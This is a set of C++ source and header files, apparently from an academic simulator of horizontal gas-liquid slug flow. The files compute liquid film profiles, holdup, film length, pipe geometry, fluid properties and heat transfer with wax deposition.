double FilmProfile::hFDetermination(double Lf, double hMax,double EpsilonZh) {
hFArray.clear();
zArray.clear();
std::ofstream output;
output.open("Output.txt");
int zLoop;
//Average HLTB based on predicted film profile
//Unit slug length
double Lu;
Lu = Lf + Ls;
//RK45 variables
double z = 0;
double h = 0.000001;
double RKFEps = 0.00001;
double TotalZ = Lf;
double StepRatio = 1;
double hMin = 0.000001;
double TotalCount, F;
double XxAtZ, hminCondition;
double xx;
double KK[6];
double ERK4, ERKFVal;
double HLTBPrev;
//Error
double Eps = 10, Eps2 = 10;
//location dependent film liquid holdup and velociy
//Other hydrodynamic parameters
double x;
double hF;
double hFLLS; //hF for HLLS
double fS;
double HLTBComparison = 10;
//liquid mass flow rate
double WLCal; //Calculated liquid mass flow rate to be checked
double WL = VSL * Pi*0.25*ID*ID*RhoL; //input liquid mass flow rate
//other variables
double gEnglish = 32.2;
double Sum = 0, Sum2 = 0, Sum3 = 0, SumHfAvg = 0;
double Flag = 0;
double Tsm;
double PreVal = 0;
k = 0;
HLLS = 1 / (1 + pow(Vm / 8.66, 1.39));
//In this while loop, the HLLS from Zhang 2003 is calculated
//His approach is in implicit form and that is why it required
//iterative aprroach to be olved
while (HLTBComparison > EpsilonZh)
{
hFArray.clear();
zArray.clear();
z = 0;
h = 0.0000001;
RKFEps = 0.00001;
TotalZ = Lf;
double StepRatio = 1;
hMin = 0.000001;
k = k + 1;
//liquid height for HLLS is calculated
StratifiedFlowGeometry Geometry(HLLS,ID);
hFLLS = Geometry.hLTilt*ID*0.99;
if (hFdZ(hFLLS) > 0)
{
hF = hFCriticalDetermination()*0.99;
}
else {
hF = hFLLS;
}
hFArray.push_back(hF);
zArray.push_back(0);
//This is boundary condition for ODE of dhF/dz
//These hydrodynamic parameters are recalculated using the new HLLS
x = (VTb - VLLS)*RhoL*0.25*Pi*ID*ID*HLLS;
VLLS = ((VSL + VSG) - VGLS * (1 - HLLS)) / HLLS;
RhoS = RhoL * HLLS + RhoG * (1 - HLLS);
MuS = MuL * HLLS + MuG * (1 - HLLS);
//In this "for loop", axial locations are iterated
for (zLoop = 0; zLoop < 4000; zLoop++) {
if (z >= TotalZ) {
break;
}
XxAtZ = hF;
F = hFdZ(hF);
hminCondition = 0;
//This is RK45 calculation
for (int RKFLoop = 1; RKFLoop < 1000; RKFLoop++) {
h = h * StepRatio;
if (h > hMax) {
h = hMax;
}
if (h < hMin) {
h = hMin;
hminCondition = 1;
}
if (z + h >= TotalZ) {
h = TotalZ - z;
}
//Cal KK1
xx = hF;
F = hFdZ(hF);
KK[0] = F;
//Cal KK2
xx = XxAtZ + h / 4.0*KK[0];
F = hFdZ(xx);
KK[1] = F;
//Cal KK3
xx = XxAtZ + h * (3.0 / 32.0*KK[0] + 9.0 / 32.0*KK[1]);
F = hFdZ(xx);
KK[2] = F;
//Cal KK4
xx = XxAtZ + h * (1932.0 / 2197.0*KK[0] - 7200.0 /
2197.0*KK[1] + 7296.0 / 2197.0*KK[2]);
F = hFdZ(xx);
KK[3] = F;
//Cal KK5
xx = XxAtZ + h * (439.0 / 216.0*KK[0] - 8.0*KK[1] + 3680.0 /
513.0*KK[2] - 845.0 / 4104.0*KK[3]);
F = hFdZ(xx);
KK[4] = F;
//Cal KK6
xx = XxAtZ + h * (-8.0 / 27.0*KK[0] + 2.0*KK[1] - 3544.0 / 2565.0*KK[2]
+ 1859.0 / 4104.0*KK[3] - 11.0 / 40.0*KK[4]);
F = hFdZ(xx);
KK[5] = F;
ERK4 = abs(h*(KK[0] / 360.0 - 128.0 / 4275.0*KK[2] - 2197.0 / 75240.0*
KK[3] + KK[4] / 50.0 + 2.0 / 55.0*KK[5]));
ERKFVal = ERK4;
if (ERKFVal != 0) {
StepRatio = pow((abs(RKFEps*h / 2.0 / ERKFVal)), 0.25);
}
else {
StepRatio = 1.25;
}
if (StepRatio < 0.05) {
StepRatio = 0.05;
}
if (StepRatio >= 1.0) {
break;
}
if (RKFLoop > 999) {
std::cout << "WRONG";
}
}
//At one specific axial location, hF is calculated
XxAtZ = XxAtZ + h * (16.0 / 135.0*KK[0] + 6656.0 / 12825.0*KK[2] +
28561.0 / 56430.0*KK[3] - 9.0 / 50.0*KK[4] + 2.0 / 55.0*KK[5]);
hF = XxAtZ;
z = z + h;
hFArray.push_back(hF);
zArray.push_back(z);
Sum = 0;
Flag = 0;
Sum2 = 0;
Sum3 = 0;
SumHfAvg = 0;
for (int jj = 1; jj < zLoop + 2; jj++)
{
if (zLoop == 10)
{
double a;
a = 1;
}
//HLTB is calculated for each predicted hF
if (jj > 0) {
HLTBPrev = (1 / Pi)*(Pi - acos(2 * (hFArray[jj - 1]) / ID - 1) + (2 * (hFArray[jj - 1]) / ID - 1)*pow(1 - pow(2 * (hFArray[jj - 1]) / ID - 1, 2), 0.5));;
}
else {
HLTBPrev = 0;
}
HLTB = (1 / Pi)*(Pi - acos(2 * (hFArray[jj]) / ID - 1) + (2 * (hFArray[jj]) / ID - 1)*pow(1 - pow(2 * (hFArray[jj]) / ID - 1, 2), 0.5));
HLTB = (HLTB + HLTBPrev) / 2.0;
hFAvg = (hFArray[jj] + hFArray[jj - 1]) / 2.0;
//Integral in mass balance relation
Sum = Sum + RhoL * Pi * ID*ID*0.25*HLTB*(zArray[jj] - zArray[jj - 1]);
//To calculate the average HLTB
Sum2 = Sum2 + HLTB * (zArray[jj] - zArray[jj - 1]);
SumHfAvg = SumHfAvg + hFAvg * (zArray[jj] - zArray[jj - 1]);
//Sum3 = Sum3 + (VTb / Lu)*(1 - HLTB)*(zArray[jj] - zArray[jj - 1]);
}
//Trapezoidal method for calculation of average HLTB
double SumNew = 0;
for (int jj = 1; jj < zLoop +2; jj++)
{
double HLTBNew = (1 / Pi)*(Pi - acos(2 * (hFArray[jj]) / ID - 1) +
(2 * (hFArray[jj]) / ID - 1)*pow(1 -
pow(2 * (hFArray[jj]) / ID - 1, 2), 0.5));
double HLTBPast = (1 / Pi)*(Pi - acos(2 * (hFArray[jj-1]) /
ID - 1) + (2 * (hFArray[jj-1]) / ID - 1)*
pow(1 - pow(2 * (hFArray[jj-1]) / ID - 1, 2), 0.5));
HLTB = (HLTBPast + HLTBNew) / 2.0;
double m = (HLTBNew - HLTBPast) / (zArray[jj] - zArray[jj-1]);
double x1, x2, x3;
double y1, y2, y3;
x1 = zArray[jj-1] + (zArray[jj] - zArray[jj - 1]) / 3.0;
y1 = m * x1 - m * zArray[jj-1] + HLTBPast;
x2 = x1 + (zArray[jj] - zArray[jj - 1]) / 3.0;
y2 = m * x2 - m * zArray[jj-1] + HLTBPast;
Sum3 = Sum3 + (VTb / Lu)*(1 - HLTB)*(zArray[jj] - zArray[jj - 1]);
SumNew = SumNew + ((zArray[jj] - zArray[jj - 1]) / 6.0)*
(HLTBPast + 2 * y1 + 2 * y2 + HLTBNew);
}
//Trapezoidal method HLTBAvg
HLTBAvg=SumNew / Lf;
StratifiedFlowGeometry Geom(HLTBAvg,ID);
hFAvg = Geom.hLTilt*ID;
//Calculated mass flow rate
WLCal = (RhoL * (Ls)*Pi * ID*ID*0.25*HLLS + RhoL * Pi *
ID*ID*0.25*HLTBAvg*Lf)*(VTb / Lu) - x;
//Error calculation of calculated mass flow rate and input mass flow rate
Eps = WLCal - WL;
Eps2 = VSL - VLLS * HLLS - VTb * (1 - HLLS)*Lf / Lu + Sum3;
//Average liquid film holdup
//HLTBAvg = Sum2 / Lf;
//hFAvg = SumHfAvg / Lf;
if (Con == 1) {
std::cout << std::endl;
}
}
VLTB = VTb - (VTb - VLLS)*HLLS / HLTBAvg;
VGTB = VTb - (VTb - VGLS)*(1 - HLLS) / (1 - HLTBAvg);
//HLLS calculation from Zhang 2003
fS = FannningFrictionFactor(RhoS, Vm, ID, MuL, PipeRoughness);
Tsm = (2.0 / 2.5)*(0.5*fS*RhoS*Vm*Vm + 0.25*ID*RhoL*HLTBAvg*
(VTb - VLTB)*(Vm - VLTB) / Ls);
HLLS = 1 / (1 + (Tsm / (3.16*pow((RhoL - RhoG)*g*IT, 0.5))));
//Comparing newlly calculated HLTBAvg from the new HLLS with HLTBAvg
//from previous iteration and HLLS
HLTBComparison = abs(PreVal - HLTBAvg);
PreVal = HLTBAvg;
z = 0;
}
ZSize = zLoop;
return(Eps);
}
//In this method, the right Lf will be chosen so the mass is conserved
//In other words, by this method, correct film length is calculated
//I used bisection method for soliving for the root
//the two values of negative and positive values shoudl be checked for each case
double FilmProfile::LfDetermination(double InitialGuess,double dx, double Epsilon,
double hMax, double EpsilonZh) {
double Lf = 16, Eps = 10;;
double F = 10;
double err1 = 10;
double check;
double x,FPrime = 0;
x = InitialGuess;
err=hFDetermination(x, hMax, EpsilonZh);
err = 10;
while (err > Epsilon)
{
FPrime = (hFDetermination(x + dx,hMax, EpsilonZh) -
hFDetermination(x, hMax, EpsilonZh)) / dx;
x = x - hFDetermination(x, hMax, EpsilonZh) / FPrime;
err = abs(hFDetermination(x, hMax, EpsilonZh));
}
err = hFDetermination(x, hMax, EpsilonZh);
return(x);
}
void FilmProfile::HyrodynamicProperties(double InitialGuess, double dx,
double Epsilon, double hMax,
double EpsilonZh) {
XSave.clear();
HLTBSave.clear();
std::ofstream output;
output.open("Output.txt");
LfFinal = LfDetermination(InitialGuess,dx,Epsilon, hMax, EpsilonZh);
hFDetermination(LfFinal, hMax,EpsilonZh);
StratifiedFlowGeometry Geo(HLTBAvg,ID);
output << "Calculated Error: " << err << std::endl;
output << "Pressure: " << P / 6894.76 << " Psia" << std::endl;
output << "Liquid superficial velocity (VSL): " << VSL << " m/s" << std::endl;
output << "Gas superficial velocity (VSG): " << VSG << " m/s" << std::endl;
output << "Liquid density: " << RhoL << " kg/m3" << std::endl;
output << "Gas density: " << RhoG << " kg/m3" << std::endl;
output << "Liquid viscosity: " << MuL << " Pa.s" << std::endl;
output << "Gas viscosity: " << MuG << " Pa.s" << std::endl;
output << "Liquid film holdup: " << HLTBAvg << std::endl;
output << "Liquid slug holdup: " << HLLS << std::endl;
output << "SL: " << (Geo.SLTilt)*ID << " m" << std::endl; //0.16485 0.06954
output << "SI: " << Geo.SITilt*ID << " m" << std::endl;
output << "Film velocity (Lf): " << VLTB << " m/s" << std::endl;
output << "Gas core velocity (Vg): " << VTb - (VTb - VGLS)*(1 - HLLS) /
(1 - HLTBAvg) << " m/s" << std::endl;
output << "Unit slug length (Lu): " << LfFinal+Ls << " m" << std::endl;
output << "Film length (Lf): " << LfFinal << " m" << std::endl;
output << "Slug length (Ls): " << Ls << " m" << std::endl;
output << std::endl;
output << "Z " << "HLTB: " << std::endl;
for (int j = 0; j < ZSize + 1; j++) {
HLTB = (1 / Pi)*(Pi - acos(2 * (hFArray[j]) / ID - 1) + (2 * (hFArray[j])
/ ID - 1)*pow(1 - pow(2 * (hFArray[j]) / ID - 1, 2), 0.5));
output << zArray[j] << " " << HLTB << std::endl;
XSave.push_back(zArray[j]);
HLTBSave.push_back(HLTB);
}
}
}//namespace MultiphaseTemperature
//Some formulas for Frequency::
//Freq = 0.0226*(pow((VSL / gEnglish / ID), (1.2)))*(pow((212.6 / (VSL + VSG) / 3.28084 + (VSL + VSG)*3.28084), (1.2)))*(0.836);
//double Freq = 0.19;
//Freq = exp(0.8 + 1.53*log(VSL / 0.36) + 0.27*((VSG / (1 - 0.36)) - VSL / 0.36) / Vm - 34.1*ID);
//Freq = 0.0226*pow((VSL / g / ID)*(19.75 / Vm + Vm), 1.2);
//Freq = 0.8428*pow((VSL / g / (ID * 1000))*(19.75 / Vm + Vm), 0.25);
//Freq = 0.0364*(VSL / Vm)*pow(2.02 / ID + Vm * Vm / g / ID, 1.06); //Not good
//Freq = 0.47*pow(VSL, 0.75) / (pow(ID, 1.2)*pow(0.3048 * 53, 0.55)); //Not good
//Freq = exp(0.8 + 1.53*log(VSL / HLTB) + 0.27*(VTb / Vm) - 34.1*ID); //Not too bad
//Freq = 2.623*(VSL / ID)*(1 / pow(pow(ID, 3.0 / 2.0)*pow(RhoL*(RhoL - RhoG)*g, 0.5) / MuL, 0.612)); //hugely underestimated
//Freq = 0.61 - (RhoG - VSG / (1 - 0.36)) / (RhoL*(ID - 0.36*ID)); //Not good
//Freq = 0.088*(VSL + 1.5)*(VSL + 1.5) / g / ID; //Overestimated
//Freq = 1.2*VSL / (32 * ID);
//Lu = VTb / Freq;
<file_sep>#ifndef CorrectHydroProps_H
#define CorrectHydroProps_H
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "dPCalculation.h"
#include "SlugFlowHeatTransfer.h"
namespace MultiphaseTemperature
{
class SPModel
{
public:
std::vector<std::vector<std::vector<std::vector<double>>>>TwWithHydroUpdate;
std::vector<std::vector<double>> TSWithHydroUpdate;
std::vector<std::vector<double>> TLWithHydroUpdate;
std::vector<std::vector<double>> TGWithHydroUpdate;
std::vector<std::vector<double>> hHot;
std::vector<std::vector<std::vector<double>>> KDepo;
//This vector contains the r_ref*U_ref parameter for the over heat transfer calculation
std::vector<double> ru;
/*In this method, the temperature distribution is estimated using
the correct hydrodynamic update after one T_u*/
double TForHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg,
std::vector<std::vector<double>> SlugFilmAssign,
std::vector<double>& q, int Nx, double Tm);
void SlugHeatTransferWithHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg,
std::vector<std::vector<double>> SlugFilmAssign,
std::vector<double>& q, int Nx, int NTime, double Tm);
void RrefUref(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<std::vector<double>> SlugFilmAssign,
std::vector<double>& q, int Nx, int NTime, double Tm);
double FrictionFactorAnnulus(double Rho, double V, double dpOut, double danIn, double Mu);
double NuxGn(double Rho, double v, double dpOut, double danIn,
double Mu, double Cp, double K, double dx);
};
} //End of namespace MultiphaseTemperature
#endif
<file_sep>#ifndef CaseSpecificInputs_H
#define CaseSpecificInputs_H
#include<cmath>
#include <iostream>
namespace user {
class FluidProperties {
double T;
double P;
double MW = 17.68358;
public:
FluidProperties(double T, double P);
class Liquid {
public:
double T;
double P;
double MW;
FluidProperties *container;
void SetContainer(FluidProperties &container);
void Render(void);
//T should be Kelvin, P is 350 Psig
double Cp(FluidProperties &container);
//At 350 Psig ONLY
double Rho(FluidProperties &container);
double Mu(FluidProperties &container);
double STG(FluidProperties &container);
double K(FluidProperties &container);
};
class Gas {
public:
double T;
double P;
//In this parameter is manually put here. (Be carefull)
double MW = 17.68358;
FluidProperties *container;
void SetContainer(FluidProperties &container);
void Render(void);
double Z(FluidProperties &container);
double Cp(FluidProperties &container);
double Rho(FluidProperties &container);
//At 350 psig pressure ONLY
double Rho2(FluidProperties &container);
double Mu(FluidProperties &container);
double K(FluidProperties &container);
};
Liquid Liquid;
Gas Gas;
};
class PipeGeometry {
public:
double Roughness = 0.0018*0.0254; //Meter
double IDPipe = 2.067*0.0254; //Meter
double ODPipe = 2.375*0.0254; //Meter
double KPipe = 16;//w/m/k
//https://www.engineersedge.com/materials/specific_heat_capacity_of_metals_13259.htm
double CPPipe = 502.416; //J/Kg/K
//https://www.engineeringtoolbox.com/steel-pipes-dimensions-d_43.html
double RhoPipe = 7835.34367; //Kg/m3 (3.65 lb/ft) / (0.007462024 ft2)
double IDJacket = 3.826*0.0254;
double ODJacket = 4.5*0.0254;
//Seems test length
double Length = 0.3048 * 53;
};
}//namespace user {
#endif
<file_sep>#ifndef SlugFlowFilmProfile_H
#define SlugFlowFilmProfile_H
#include <cmath>
#include <iostream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
namespace MultiphaseTemperature {
//Please note the following class is for horizontal case
//however, it can easily be modified for inclined case
class FilmProfile {
private:
double Pi = 3.14159265358979;//Pi number
double ID, OD, VSG, VSL, T, P, PipeRoughness, RhoL, RhoG, MuL, MuG,C0, g, RhoS, MuS, IT;
int k;
int Con;
double Tol = 0.001;
int Flag2;
double hFdZ(double hF);
double hFDetermination(double Lf, double hMax, double EpsilonZh);
double LfDetermination(double InitialGuess, double dx, double Err,
double hMax, double EpsilonZh);
public:
//These arrays are used to store hf and z values
std::vector<double>zArray, hFArray;
//double hFArray[1000], zArray[1000];
//Final error
double err = 10;
double VLTB, VGTB, VLLS, VGLS, Vm, VTb;
double HLLS, LfFinal, Ls, HLTB,HLTBAvg;
double hFAvg;
int ZSize;
FilmProfile(std::vector < double > & FilmProfileInputs);
double FannningFrictionFactor(double Rho, double V, double d, double Mu,
double Roughness);
void HyrodynamicProperties(double InitialGuess, double dx, double Epsilon,
double hMax, double EpsilonZh);
double hFCritical(double hF);
double hFCriticalDetermination();
//void ReportParams();
friend class SlugFLowHeatTransferCal;
std::vector<double> XSave;
std::vector<double> HLTBSave;
double CalculatedError;
double AvgFilmHoldUp_HLTB;
double AvgSlugHoldUp_HLLS;
double FilmVelocity_VLTB;
double GasCoreVelocity_Vg;
double UnitSlugLength_Lu;
double FilmLength_Lf;
double SlugLength_Ls;
};
}//namespace MultiphaseTemperature
#endif
<file_sep>#define _USE_MATH_DEFINES
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include <math.h>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
#include "CorrectHydroProps.h"
namespace MultiphaseTemperature
{
double SPModel::TForHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& q,
int Nx, double Tm)
{
double LfPre, LfCurr = 1000;
double Temp=302;
double AvgTBK = Tm;
double EpsLf;
for (int kL = 0; kL < 100; kL++)
{
//Hydrodynamic properties calculation
LfPre = LfCurr;
SlugFLowHeatTransferCal SFHT;
SFHT.SlugFlowHeatModel(SlugFLowHeatTransferCalInputs, WaxVector, WaxSolidFraction,
HydroInputs,TwInitial,Ts,Tf,Tg, q,Nx, Nx, Temp);
Temp = SFHT.AvgTBK;
SFHT.HydroUpdate(HydroInputs, Temp);
LfCurr = SFHT.Lf;
EpsLf = abs(LfCurr - LfPre);
if (EpsLf < 0.001) {
break;
}
}
return(Temp);
}
void SPModel::SlugHeatTransferWithHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& q,
int Nx, int NTime, double Tm)
{
TwWithHydroUpdate.clear();
TSWithHydroUpdate.clear();
TGWithHydroUpdate.clear();
TLWithHydroUpdate.clear();
KDepo.clear();
hHot.clear();
double CorrectTemp;
CorrectTemp = TForHydroUpdate(SlugFLowHeatTransferCalInputs, WaxVector, WaxSolidFraction, HydroInputs,
TwInitial, Ts, Tf, Tg, q, Nx, Tm);
SlugFLowHeatTransferCal SFHT;
SFHT.SlugFlowHeatModel(SlugFLowHeatTransferCalInputs, WaxVector, WaxSolidFraction,
HydroInputs, TwInitial, Ts, Tf, Tg, q, Nx, Nx, CorrectTemp);
TwWithHydroUpdate = SFHT.TwSave;
TSWithHydroUpdate = SFHT.TSSave;
TGWithHydroUpdate = SFHT.TGSave;
TLWithHydroUpdate = SFHT.TLSave;
KDepo=SFHT.KDepoSave;
hHot=SFHT.hHotSave;
TwInitial = SFHT.Tw;
Ts = SFHT.TS;
Tf = SFHT.TL;
Tg = SFHT.TG;
}
//Gnielinski(2009), friction factor in the annulus
double SPModel::FrictionFactorAnnulus(double Rho, double V, double dpOut,
double danIn, double Mu) {
double Dhyd = danIn - dpOut;
double Re,ReStar, a;
double ans;
a = dpOut / danIn;
Re = Rho * V*Dhyd / Mu;
ReStar = Re * ((1 + a * a)*log(a) + 1 - a * a) / ((1 - a * a)*log(a));
ans = pow(1.8*log10(ReStar) - 1.5, -2.0);
return(ans);
}
//k is assumed to be 1, Not accurate
double SPModel::NuxGn(double Rho, double v, double dpOut, double danIn,
double Mu, double Cp, double K, double dx)
{
double ans;
double Dhyd = danIn - dpOut;
double Re = Rho * v*Dhyd / Mu;
double Pr = Mu * Cp / K;
double a = dpOut / danIn;
double Fan = 0.75*pow(a, -0.17);
double k1;
double friction;
k1 = 1.07 + 900.0 / Re - 0.63 / (1 + 10 * Pr);
friction = FrictionFactorAnnulus(Rho, v,dpOut,danIn,Mu);
ans = (friction / 8.0*Pr*Re)*(1 + pow(Dhyd / dx, 2.0 / 3.0))*(Fan) /
(k1 + 12.7*pow(friction / 8.0, 0.5)*(pow(Pr, 2.0 / 3.0) - 1));
return(ans);
}
void SPModel::RrefUref(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& q,
int Nx, int NTime, double Tm)
{
//By this method, the slug flow heat tranfser calcualtion is performed and
//TS, TG, TL, Tw and nusslet number is calcuated with correct
SlugHeatTransferWithHydroUpdate(SlugFLowHeatTransferCalInputs, WaxVector,
WaxSolidFraction, HydroInputs, TwInitial, Ts, Tf, Tg, q, Nx, NTime, Tm);
}
} //end of namespace MultiphaseTemperature
<file_sep>#include "StratifiedFlowGeometry.h"
#include "CaseSpecificInputs.h"
#include <iostream>
#include <cmath>
namespace MultiphaseTemperature {
//In this constructor please note that we want to calculate liquid height (hL).
//h is the liquid holdup. One should make sure to know the differences between the two
//h=AL/AP, by knowing this relationship, we can calculate AL and then calculate hL
StratifiedFlowGeometry::StratifiedFlowGeometry(double H,double IDEffective) {
user::PipeGeometry Pipe;
ID = IDEffective;
double AP = 0.25*ID * ID*Pi;
double hh = H * ID;
double AL = H * AP;
double hLTi;
double Eps = 10;
double dx = 0.000000001;
double F, FPlusdx, FPrime;
while (Eps > 0.00000001)
{
F = ID * ID*(0.25*(Pi - acos(2 * (hh / ID) - 1) +
(2 * (hh / ID) - 1)*pow(1 - pow(2 * (hh / ID) - 1, 2), 0.5))) - H * AP;
FPlusdx = ID * ID*(0.25*(Pi - acos(2 * ((hh + dx) / ID) - 1) +
(2 * ((hh + dx) / ID) - 1)*pow(1 - pow(2 * ((hh + dx) / ID)
- 1, 2), 0.5))) - H * AP;
FPrime = ((FPlusdx)-(F)) / dx;
hh = hh - F / FPrime;
Eps = F;
}
H = hh;
hL = H;
A = Pi * ID*ID*0.25;
hLTilt = hL / ID;
SGTilt = acos(2 * hLTilt - 1);
SLTilt = Pi - acos(2 * hLTilt - 1);
SITilt = pow(1 - pow(2 * hLTilt - 1, 2), 0.5);
AGTilt = 0.25*(acos(2 * hLTilt - 1) - SITilt * (2 * hLTilt - 1));
ALTilt = 0.25*(Pi - acos(2 * hLTilt - 1) +
(2 * hLTilt - 1)*pow(1 - pow(2 * hLTilt - 1, 2), 0.5));
dL = 4.0 * ALTilt*ID*ID / (SLTilt*ID);
dG = 4.0 * AGTilt*ID*ID / (SITilt*ID + SGTilt * ID);
if (hL < 0.5*ID)
{
Theta = 2 * acos((0.5*ID - hL) / (0.5*ID));
}
else if (hL == 0.5*ID) {
Theta = Pi;
}
else {
Theta = Pi + 2 * asin((hL - 0.5*ID) / (0.5*ID));
}
}
}//namespace MultiphaseTemperature {<file_sep>#define _USE_MATH_DEFINES
#include <iostream>
#include <chrono>
#include <cmath>
#include <vector>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
#include "OveralHeatTransfer.h"
#include <omp.h>
//namespace MultiphaseTemperature {
int main() {
double a;
user::PipeGeometry Pipe;
int Nx=50, NTime=1000;
double T = 29+273.15;
double P = (14.7+350)*6894.76;
double VSG =1*0.305515;
double VSL =4*0.305515;
//ID should be an input parameter for slugfilm but not for heat transfer
double ID = Pipe.IDPipe;
double Roughness = 0.00004572;
double IT = 0.025;
double TInitial = 302;
double InitialGuess =0.1, dx = 0.01, Epsilon = 0.01, hMax =0.1, EpsilonZh = 0.001;
user::FluidProperties Fluid(T, P);
std::vector<double> FilmInputs;
std::vector<double> HydroInputs;
std::vector<double> HeatInputs;
std::vector<std::vector<double>> WaxThickness;
std::vector<std::vector<double>> WaxFraction;
std::vector<double> q;
std::vector<double> TS;
std::vector<double> TL;
std::vector<double> TG;
std::vector<bool> SlugFlow;
std::vector<double> HLTbLocation;
//Initial condition assignment
std::vector<std::vector<std::vector<double>>>Tw;
Tw.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++) //To include the initial condtion as contant temperature
{
Tw[xx].resize(4 + 1);
for (int WL = 1; WL < 4 + 1; WL++) //starts from 1 to 3
{
Tw[xx][WL].resize(4 + 1);
for (int RS = 1; RS < 4 + 1; RS++) //starts from 1 to 4
{
//***************************Possible modifications are requried
/*It is assumed that inlet temperature is constant and it is equal
to T at t=0 everywhere. Later this assumption should be substitute
with pipe-in-pipe counter courent flow */
Tw[xx][WL][RS] = TInitial;
}
}
TL.push_back(TInitial);
TG.push_back(TInitial);
TS.push_back(TInitial);
q.push_back(8.0);
}
WaxThickness.resize(Nx + 1);
WaxFraction.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
WaxFraction[xx].resize(5);
WaxFraction[xx][1] = 0.001/* + double(xx) / double(Nx) * 0.5*0.04*/;
WaxFraction[xx][2] = 0.001/*WaxFraction[xx][1] - WaxFraction[xx][1] * 0.1*/;
WaxFraction[xx][3] = 0.001/* WaxFraction[xx][1] - WaxFraction[xx][1] * 0.2*/;
WaxFraction[xx][4] = WaxFraction[xx][2];
WaxThickness[xx].resize(5);
WaxThickness[xx][1] = 0.0005 /*+ double(xx) / double (Nx) * 0.5*0.001*/;
WaxThickness[xx][2] = WaxThickness[xx][1] /*- WaxThickness[xx][1] * 0.1*/;
WaxThickness[xx][3]= WaxThickness[xx][1] /*- WaxThickness[xx][1] * 0.2*/;
WaxThickness[xx][4] = WaxThickness[xx][2];
}
//FilmInputs, WaxWidthVector, WaxSolidFraction, HydroInputs, TwInitial,
// Ts, Tf, Tg, FilmAssign,
// SlugAssign, q, NxInput, Tm, TInlet
FilmInputs.clear();
HydroInputs.clear();
FilmInputs.push_back(VSL); FilmInputs.push_back(VSG);
FilmInputs.push_back(ID); FilmInputs.push_back(T-273.15); //T has to be in C
FilmInputs.push_back(P); FilmInputs.push_back(Roughness);
FilmInputs.push_back(IT);
HydroInputs.push_back(InitialGuess); HydroInputs.push_back(dx);
HydroInputs.push_back(Epsilon); HydroInputs.push_back(hMax);
HydroInputs.push_back(EpsilonZh);
double TCorr;
MultiphaseTemperature::SlugFLowHeatTransferCal OBJ;
OBJ.HydroUpdate(FilmInputs, HydroInputs);
SlugFlow.resize(Nx+1);
HLTbLocation.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
SlugFlow[xx] = false;
HLTbLocation[xx] = false;
if (xx <= (OBJ.NxF - 1))
{
SlugFlow[xx] = false;
HLTbLocation[xx] = OBJ.HLTBOrgNew[xx];
}
if (xx >(OBJ.NxF - 1))
{
SlugFlow[xx] = true;
}
//s1 = HLTbLocation[xx]; s2 = SlugFlow[xx];
}
double ch;
MultiphaseTemperature::SlugFlowOveralHeatTranfer obj2;
ch=obj2.AvgTempForHydroUpdate(FilmInputs, WaxThickness,
WaxFraction, HydroInputs,
Tw, TS, TL, TG, HLTbLocation,
SlugFlow, q, 302.15,0.001);
auto start_time = std::chrono::high_resolution_clock::now();
auto end_time = std::chrono::high_resolution_clock::now();
std::cout << "The total program run-time in milliseconds is ";
std::cout << std::chrono::duration_cast<std::chrono::milliseconds>(
end_time - start_time).count() << '\n';
std::system("pause");
}
<file_sep>#include <iostream>
#include <cmath>
#include "CaseSpecificInputs.h"
namespace user {
FluidProperties::FluidProperties(double Temp, double Press) {
T = Temp + 273.15;
P = Press;
}
//Liquid properties
void FluidProperties::Liquid::SetContainer(FluidProperties &container)
{
this->container = &container;
}
void FluidProperties::Liquid::Render(void)
{
T = container->T;
P = container->P;
}
//Checked
double FluidProperties::Liquid::Cp(FluidProperties &container)
{
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(2.0819*TF + 1.8858 * 1000); //very good accuracy
} //T should be Kelvin, P is 350 Psig
//Checked
double FluidProperties::Liquid::Rho(FluidProperties &container)//At 350 Psig ONLY
{//[kg/m3]
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(-3.963*0.1*TF + 8.586 * 100);
}
